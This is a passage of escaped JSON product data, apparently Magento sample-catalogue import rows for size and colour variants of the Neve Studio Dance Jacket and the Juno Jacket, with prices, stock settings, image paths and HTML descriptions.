Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1314\":{\"sku\":\"WJ11-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-XL-Black\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"1315\":{\"sku\":\"WJ11-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-XL-Blue\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj11-blue_alt1.jpg,\\/w\\/j\\/wj11-blue_back.jpg\",\"image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj11-blue_alt1.jpg,\\/w\\/j\\/wj11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1316\":{\"sku\":\"WJ11-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket-XL-Orange\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"neve-studio-dance-jacket-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1317\":{\"sku\":\"WJ11\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Neve Studio Dance Jacket\",\"description\":\"<p>If you\'re constantly on the move, the Neve Studio Dance Jacket is for you. It\'s not just for dance, either, with a tight fit that works as a mid-layer. The reversible design makes it even more versatile.<\\/p>\\n<p>&bull; Bright blue 1\\/4 zip pullover.<br \\/>&bull; CoolTech&trade; liner is sweat-wicking.<br \\/>&bull; Sleeve thumbholes.<br \\/>&bull; Zipper garage to protect your chin.<br \\/>&bull; Stretchy collar drawcords.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Jacket|Pullover|Hooded|Lightweight|Soft Shell|&frac14; zip|Reversible,material=Lycra&reg;|Mesh|Nylon|CoolTech&trade;,pattern=Solid,climate=Indoor|Mild|Spring,eco_collection=No,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WJ11-XS-Black,size=XS,color=Black|sku=WJ11-XS-Blue,size=XS,color=Blue|sku=WJ11-XS-Orange,size=XS,color=Orange|sku=WJ11-S-Black,size=S,color=Black|sku=WJ11-S-Blue,size=S,color=Blue|sku=WJ11-S-Orange,size=S,color=Orange|sku=WJ11-M-Black,size=M,color=Black|sku=WJ11-M-Blue,size=M,color=Blue|sku=WJ11-M-Orange,size=M,color=Orange|sku=WJ11-L-Black,size=L,color=Black|sku=WJ11-L-Blue,size=L,color=Blue|sku=WJ11-L-Orange,size=L,color=Orange|sku=WJ11-XL-Black,size=XL,color=Black|sku=WJ11-XL-Blue,size=XL,color=Blue|sku=WJ11-XL-Orange,size=XL,color=Orange\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj11-blue_alt1.jpg,\\/w\\/j\\/wj11-blue_back.jpg\",\"image\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj11-blue_alt1.jpg,\\/w\\/j\\/wj11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Jacket|Pullover|Hooded|Lightweight|Soft Shell|&frac14; zip|Reversible\",\"material\":\"Lycra&reg;|Mesh|Nylon|CoolTech&trade;\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Mild|Spring\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"1318\":{\"sku\":\"WJ06-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-XS-Blue\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"1319\":{\"sku\":\"WJ06-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-XS-Green\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1320\":{\"sku\":\"WJ06-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-XS-Purple\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"77\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"juno-jacket-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj06-purple_alt1.jpg,\\/w\\/j\\/wj06-purple_back.jpg\",\"image\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj06-purple_alt1.jpg,\\/w\\/j\\/wj06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1321\":{\"sku\":\"WJ06-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Juno Jacket-S-Blue\",\"description\":\"<p>On colder-than-comfortable mornings, you\'ll love warming up in the Juno All-Ways Performanc Jacket, designed to compete with wind and chill. Built-in Cocona&reg; technology aids evaporation, while a special zip placket and stand-up collar keep your neck protected.<\\/p>\\n<p>&bull; Adjustable hood.<\\/br>&bull; Fleece-lined, zippered hand pockets.<\\/br>&bull; Thumbhole cuffs.<\\/br>&bull; Full zip.<\\/br>&bull; Mock-neck collar.<\\/br>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 